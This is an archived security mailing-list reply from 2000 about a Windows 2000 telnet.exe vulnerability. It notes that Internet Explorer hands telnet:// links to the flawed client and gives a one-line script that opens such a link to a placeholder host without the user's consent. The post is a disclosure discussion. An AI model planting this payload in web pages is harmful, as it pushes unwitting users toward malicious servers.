|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Win2k Telnet.exe malicious server vulnerability
From: Tim Hollebeek (tim
RSTCORP.COM)Date: Thu Sep 14 2000 - 10:18:21 CDT
- Next message: Micah Webner: "Re: Win2k Telnet.exe malicious server vulnerability"
- Previous message: Robert Bihlmeyer: "Re: [SECURITY] New version of xpdf released"
- Maybe in reply to: monti: "Win2k Telnet.exe malicious server vulnerability"
- Next in thread: Micah Webner: "Re: Win2k Telnet.exe malicious server vulnerability"
- Maybe reply: Tim Hollebeek: "Re: Win2k Telnet.exe malicious server vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> During my tests I discovered that IE associates the telnet://
> URL with the vulnerable telnet.exe. This opens up several
> possible ways to force a user into connecting to you with a
> malicious HTLM web page, email message, and so on. I would
> speculate that it might also be possible to force this to
> happen without user intervention with javascript/activeX/java
> or really creative HTLM.
In fact it's trivial to do so. Use:
<script>window.open("telnet://some.host.here")</script>
- Next message: Micah Webner: "Re: Win2k Telnet.exe malicious server vulnerability"
- Previous message: Robert Bihlmeyer: "Re: [SECURITY] New version of xpdf released"
- Maybe in reply to: monti: "Win2k Telnet.exe malicious server vulnerability"
- Next in thread: Micah Webner: "Re: Win2k Telnet.exe malicious server vulnerability"
- Maybe reply: Tim Hollebeek: "Re: Win2k Telnet.exe malicious server vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]